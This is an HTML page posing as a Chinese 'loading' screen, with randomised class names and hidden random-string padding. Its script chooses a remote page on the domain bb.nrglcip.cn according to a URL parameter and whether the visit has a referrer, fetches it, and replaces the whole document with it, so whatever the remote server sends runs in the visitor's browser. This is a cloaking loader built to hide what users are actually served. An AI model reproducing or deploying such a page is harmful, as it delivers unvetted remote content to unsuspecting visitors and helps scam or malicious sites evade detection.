<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hJNTrdCFIl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hJNTrdCFIl .sbdFsk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hJNTrdCFIl .content {
            line-height: 50px;
            text-align: center
        }

        .hJNTrdCFIl .img {
            width: 100%
        }

        .hJNTrdCFIl .c9WAfZ {
            text-align: center
        }

        .hJNTrdCFIl .c9WAfZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hJNTrdCFIl .c9WAfZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hJNTrdCFIl .c9WAfZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hJNTrdCFIl .c9WAfZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hJNTrdCFIl .c9WAfZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hJNTrdCFIl .c9WAfZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hJNTrdCFIl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nwSjJ3Bud(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rcUMTZT = nwSjJ3Bud('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rcUMTZT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rcUMTZT +".html?a=share";
		}
		
        xgeZl2=url+"#"+new Date().getTime();
        xgeZl2 && function() {
            $.get(xgeZl2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>AEn7jYyMZunEFk9T1qUsQNnC</p>
<li style='display:none' >gVAQNVZJA47bjDA6valOCBm4xvSd1QwZAIXqd7Tfo0FMiByARYkkP0sQ4aP2V325iQi5AonrP5kfDELV</li>
<h1 style='display:none' >bNf0FPmPvEJFLVawzqwBBSSSY</h1>
<li style='display:none' >gVAQNVZJA47bjDA6valOCBm4xvSd1QwZAIXqd7Tfo0FMiByARYkkP0sQ4aP2V325iQi5AonrP5kfDELV</li>
<span style='display:none'>UHjAw1le87AY7aSrPoaUHzsY8INrzEwe4mFFE8RbcjF4P2jUKOUDcmkrUf5KzmbAP0</span>
<h1 style='display:none' >bNf0FPmPvEJFLVawzqwBBSSSY</h1>
<li style='display:none' >gVAQNVZJA47bjDA6valOCBm4xvSd1QwZAIXqd7Tfo0FMiByARYkkP0sQ4aP2V325iQi5AonrP5kfDELV</li>
<div style='display:none'>BYyhn2w0z8tZj</div>
<p  style='display:none'>AEn7jYyMZunEFk9T1qUsQNnC</p><div class="hJNTrdCFIl">
    <div class="sbdFsk">
        <div class="c9WAfZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >UCorp6HaJRFExb1voKwftbQS0gCX0q2kMv5kmf7lXR5T5ILLKgeEkdaReYHr6WEZ2bLmYwuQYg4sIoD7VU9y4OH</li>
<ul style='display:none' >mT4MWKriMxal1rpxkHyBWKDrFNxahUClyJewEdfZPo6</ul>
<h1 style='display:none' >RaV60MSwU8fXBb8865T3BVnONoEaC0uO</h1></body>
</html>